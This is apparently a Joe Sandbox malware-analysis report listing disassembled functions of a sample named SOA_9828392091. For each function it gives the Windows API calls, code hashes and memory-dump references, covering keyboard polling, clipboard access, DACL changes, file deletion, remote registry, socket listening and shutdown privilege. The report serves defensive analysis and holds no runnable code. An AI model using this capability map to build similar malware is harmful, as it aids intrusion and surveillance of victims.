                                      • Instruction ID: 31b5d10f25cff0d9fde84e96c04647f40a009d4f8617358ca9b0d487afc2800d
                                      • Opcode Fuzzy Hash: 5c70a6cdd06a0dc922d49c25a284a3e36c0fe253e93d18062e17fb500dc3271e
                                      • Instruction Fuzzy Hash: 22819D71509305EFDB20CF19C994A6BBBE8FB88314F10492EF998D7291D770D905CBA2
                                      Function 0096A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0096ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0096ABD7
                                        • Part of subcall function 0096ABBB: GetLastError.KERNEL32(?,0096A69F,?,?,?), ref: 0096ABE1
                                        • Part of subcall function 0096ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0096A69F,?,?,?), ref: 0096ABF0
                                        • Part of subcall function 0096ABBB: RtlAllocateHeap.NTDLL(00000000,?,0096A69F), ref: 0096ABF7
                                        • Part of subcall function 0096ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0096AC0E
                                        • Part of subcall function 0096AC56: GetProcessHeap.KERNEL32(00000008,0096A6B5,00000000,00000000,?,0096A6B5,?), ref: 0096AC62
                                        • Part of subcall function 0096AC56: RtlAllocateHeap.NTDLL(00000000,?,0096A6B5), ref: 0096AC69
                                        • Part of subcall function 0096AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0096A6B5,?), ref: 0096AC7A
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0096A6D0
                                      • _memset.LIBCMT ref: 0096A6E5
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0096A704
                                      • GetLengthSid.ADVAPI32(?), ref: 0096A715
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0096A752
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0096A76E
                                      • GetLengthSid.ADVAPI32(?), ref: 0096A78B
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0096A79A
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0096A7A1
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0096A7C2
                                      • CopySid.ADVAPI32(00000000), ref: 0096A7C9
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0096A7FA
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0096A820
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0096A834
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                      • String ID:
                                      • API String ID: 2347767575-0
                                      • Opcode ID: 64ab21d442007bc24dabff539f53f8d0a3eb0cdf09ecb556cb5f17fcddabb822
                                      • Instruction ID: 93d24c0fdd752ad1f65cd43377cb91f4c432c4a5a68dcd50f3b3844115619b5e
                                      • Opcode Fuzzy Hash: 64ab21d442007bc24dabff539f53f8d0a3eb0cdf09ecb556cb5f17fcddabb822
                                      • Instruction Fuzzy Hash: 2B515B7190020AAFDF04DFA5DD85AEEBBB9FF04310F048129F911A72A0EB359A05DF61
                                      Function 00936F07 Relevance: 19.6, Strings: 15, Instructions: 883COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$ZZQCWCVCM
                                      • API String ID: 0-876813228
                                      • Opcode ID: e7bbc7deed6f33e2c0d2a9c4419e219fc0ae52ae15c22d1ab24b86a5d21dbb74
                                      • Instruction ID: b99fe2c044c422d64ae388d5ae3e17313549166feff81e7ece6eba3f8df921fb
                                      • Opcode Fuzzy Hash: e7bbc7deed6f33e2c0d2a9c4419e219fc0ae52ae15c22d1ab24b86a5d21dbb74
                                      • Instruction Fuzzy Hash: C7728FB1E042199BDB24CF99D9807EEB7B5FF48320F14856AE815EB280DB349E41DF90
                                      Function 009763F9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 89fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00976EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00975FA6,?), ref: 00976ED8
                                        • Part of subcall function 009772CB: GetFileAttributesW.KERNEL32(?,00976019), ref: 009772CC
                                      • _wcscat.LIBCMT ref: 00976441
                                      • __wsplitpath.LIBCMT ref: 0097645F
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00976474
                                      • _wcscpy.LIBCMT ref: 009764A3
                                      • _wcscat.LIBCMT ref: 009764B8
                                      • _wcscat.LIBCMT ref: 009764CA
                                      • DeleteFileW.KERNEL32(?), ref: 009764DA
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 009764EB
                                      • FindClose.KERNEL32(00000000), ref: 00976506
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                      • String ID: \*.*$p1#v`K$v
                                      • API String ID: 2643075503-1732502266
                                      • Opcode ID: 054cfc867a5a1e57eddf97e272e1a92b07fc49670526a7e93c4a7928797c1948
                                      • Instruction ID: 1a2e0b998ce7ea3d34f379c01aa4960ba9e5ebcc972ce31e8adb1c800860c533
                                      • Opcode Fuzzy Hash: 054cfc867a5a1e57eddf97e272e1a92b07fc49670526a7e93c4a7928797c1948
                                      • Instruction Fuzzy Hash: 3931A2B340C3849AC321DBA4C885ADBB7DCAF96310F044A2AF9D8C3141EB35D50D87A7
                                      Function 009931BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00993C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00992BB5,?,?), ref: 00993C1D
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0099328E
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0099332D
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009933C5
                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00993604
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00993611
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                      • String ID:
                                      • API String ID: 1240663315-0
                                      • Opcode ID: 4b6107244c470ce804d83cfed8e284ea49c5b725be1c9a580c72b84469072bfb
                                      • Instruction ID: 8548c2311a9d17157dba674ad241602311596a52ab908ef812ba39bd026126e2
                                      • Opcode Fuzzy Hash: 4b6107244c470ce804d83cfed8e284ea49c5b725be1c9a580c72b84469072bfb
                                      • Instruction Fuzzy Hash: B0E14A71604200AFCB14DF69C995E2ABBE9EF89714F04C96DF44ADB2A1DB30E905CF52
                                      Function 00972B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00972B5F
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00972BE0
                                      • GetKeyState.USER32(000000A0), ref: 00972BFB
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00972C15
                                      • GetKeyState.USER32(000000A1), ref: 00972C2A
                                      • GetAsyncKeyState.USER32(00000011), ref: 00972C42
                                      • GetKeyState.USER32(00000011), ref: 00972C54
                                      • GetAsyncKeyState.USER32(00000012), ref: 00972C6C
                                      • GetKeyState.USER32(00000012), ref: 00972C7E
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00972C96
                                      • GetKeyState.USER32(0000005B), ref: 00972CA8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: 2c55c7c1d3333f6788b3b7844c6996ae100814b20f19cab60031757c34a13d32
                                      • Instruction ID: 88d2960f0d6b15af28721628e58e0bab464f6809cadbf0663f9573fb8aa195cf
                                      • Opcode Fuzzy Hash: 2c55c7c1d3333f6788b3b7844c6996ae100814b20f19cab60031757c34a13d32
                                      • Instruction Fuzzy Hash: 3841E9315287C96DFF369B6489047B9BFA8AF32314F0CC099D5CA562C1EBD499C4C7A2
                                      Function 00986D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                      • String ID:
                                      • API String ID: 1737998785-0
                                      • Opcode ID: 1aebd965c5e788f984a8c2f15da0bb6a6c4ee1f35cc4e261cd59bdd868b97e90
                                      • Instruction ID: 5245d02466a24a08ec40ea885c2ef3227dea9906b97974ec351bc75f7371fb5f
                                      • Opcode Fuzzy Hash: 1aebd965c5e788f984a8c2f15da0bb6a6c4ee1f35cc4e261cd59bdd868b97e90
                                      • Instruction Fuzzy Hash: 44219A31315210EFEB11AF65DE49F2D77A8FF84721F04841AF94ADB2A1EB34E9009B90
                                      Function 0098C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00969ABF: CLSIDFromProgID.COMBASE ref: 00969ADC
                                        • Part of subcall function 00969ABF: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00969AF7
                                        • Part of subcall function 00969ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00969B05
                                        • Part of subcall function 00969ABF: CoTaskMemFree.COMBASE(00000000), ref: 00969B15
                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0098C235
                                      • _memset.LIBCMT ref: 0098C242
                                      • _memset.LIBCMT ref: 0098C360
                                      • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 0098C38C
                                      • CoTaskMemFree.COMBASE(?), ref: 0098C397
                                      Strings
                                      • NULL Pointer assignment, xrefs: 0098C3E5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                      • String ID: NULL Pointer assignment
                                      • API String ID: 1300414916-2785691316
                                      • Opcode ID: e34036a5d4f6c011951aeb586695063fc4dfda38437cb060248d4a39ebecc392
                                      • Instruction ID: e20ffaa452a67300ca98f510d46de44d1a4b97fb1313a310d2701d5f4af05246
                                      • Opcode Fuzzy Hash: e34036a5d4f6c011951aeb586695063fc4dfda38437cb060248d4a39ebecc392
                                      • Instruction Fuzzy Hash: 4E913DB1D00218ABDB10EFA4DC95FEEBBB8EF44710F10816AF515A7291EB705A45CFA0
                                      Function 009A0133 Relevance: 10.7, APIs: 7, Instructions: 245windownativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • GetSystemMetrics.USER32(0000000F), ref: 009A016D
                                      • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 009A038D
                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009A03AB
                                      • InvalidateRect.USER32(?,00000000,00000001,?), ref: 009A03D6
                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009A03FF
                                      • ShowWindow.USER32(00000003,00000000), ref: 009A0421
                                      • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 009A0440
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$MessageSend$DialogInvalidateLongMetricsMoveNtdllProc_RectShowSystem
                                      • String ID:
                                      • API String ID: 2922825909-0
                                      • Opcode ID: 39216dee1c20c740e31917c55fa20cea1e54be2e09103da1901f50eeeabbcf6b
                                      • Instruction ID: 82f6fadf95968aec58d1eb97ea01fe6d6d6c8e3a83c3d08066be1a40749d25b7
                                      • Opcode Fuzzy Hash: 39216dee1c20c740e31917c55fa20cea1e54be2e09103da1901f50eeeabbcf6b
                                      • Instruction Fuzzy Hash: 13A1A035600616EFDF18CF68C9897BDBBB5BF89750F048115EC549B250EB34AD50CB90
                                      Function 0099ECD4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                        • Part of subcall function 0094B63C: GetCursorPos.USER32(000000FF), ref: 0094B64F
                                        • Part of subcall function 0094B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0094B66C
                                        • Part of subcall function 0094B63C: GetAsyncKeyState.USER32(00000001), ref: 0094B691
                                        • Part of subcall function 0094B63C: GetAsyncKeyState.USER32(00000002), ref: 0094B69F
                                      • ReleaseCapture.USER32 ref: 0099ED48
                                      • SetWindowTextW.USER32(?,00000000), ref: 0099EDF0
                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0099EE03
                                      • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0099EEDC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                      • API String ID: 973565025-2107944366
                                      • Opcode ID: a92a2714b17949f6355efd4f44cc7bb258045017b56d1dc25ca3be0d15ebbf91
                                      • Instruction ID: 9f4b870b3e233c45a9368e92610a34e0b877f8fa6737df0e2c6f799022fce965
                                      • Opcode Fuzzy Hash: a92a2714b17949f6355efd4f44cc7bb258045017b56d1dc25ca3be0d15ebbf91
                                      • Instruction Fuzzy Hash: 3B519B70218304AFDB10EF24DC96F6A77E8FB88714F404A2DF595972E1DB70A904DB92
                                      Function 009779D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0096B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0096B180
                                        • Part of subcall function 0096B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0096B1AD
                                        • Part of subcall function 0096B134: GetLastError.KERNEL32 ref: 0096B1BA
                                      • ExitWindowsEx.USER32(?,00000000), ref: 00977A0F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                      • String ID: $@$SeShutdownPrivilege
                                      • API String ID: 2234035333-194228
                                      • Opcode ID: eac4dd8aaac4954d4027ac4c775d992a8e004e7d08e3233af37144ca77869002
                                      • Instruction ID: f282d7d2493c62f8041c0e3a3797b9f4ff38813ab0ca20358a9e360e9b7855bd
                                      • Opcode Fuzzy Hash: eac4dd8aaac4954d4027ac4c775d992a8e004e7d08e3233af37144ca77869002
                                      • Instruction Fuzzy Hash: 2901A7736692126AFB2C66F8DC5ABBFB25C9B00750F148924B957E20D2E5A55E0081B0
                                      Function 00988C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00988CA8
                                      • WSAGetLastError.WS2_32(00000000), ref: 00988CB7
                                      • bind.WS2_32(00000000,?,00000010), ref: 00988CD3
                                      • listen.WS2_32(00000000,00000005), ref: 00988CE2
                                      • WSAGetLastError.WS2_32(00000000), ref: 00988CFC
                                      • closesocket.WS2_32(00000000), ref: 00988D10
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                      • String ID:
                                      • API String ID: 1279440585-0
                                      • Opcode ID: 289140efd52f52a9824fe480b8841caa1cb7567a01d2f827bba5611e784fdce8
                                      • Instruction ID: f982aea551d2243afcd9cdbc123f14612b95654a23c8769543a62caa59592da3
                                      • Opcode Fuzzy Hash: 289140efd52f52a9824fe480b8841caa1cb7567a01d2f827bba5611e784fdce8
                                      • Instruction Fuzzy Hash: 1A21F371600201AFCB10FF28CD85B6EB7A9EF88320F108158F956A73D2CB70AD019B61
                                      Function 00976532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00976554
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00976564
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00976583
                                      • __wsplitpath.LIBCMT ref: 009765A7
                                      • _wcscat.LIBCMT ref: 009765BA
                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 009765F9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                      • String ID:
                                      • API String ID: 1605983538-0
                                      • Opcode ID: 4de20dcd3a16911c18cbe65724bb541010b3a2836474997a184e774b7b6aadce
                                      • Instruction ID: eb5069e87578673e99cd1130fd70acac11400d1afd6563bc92f036d6e37c1e74
                                      • Opcode Fuzzy Hash: 4de20dcd3a16911c18cbe65724bb541010b3a2836474997a184e774b7b6aadce
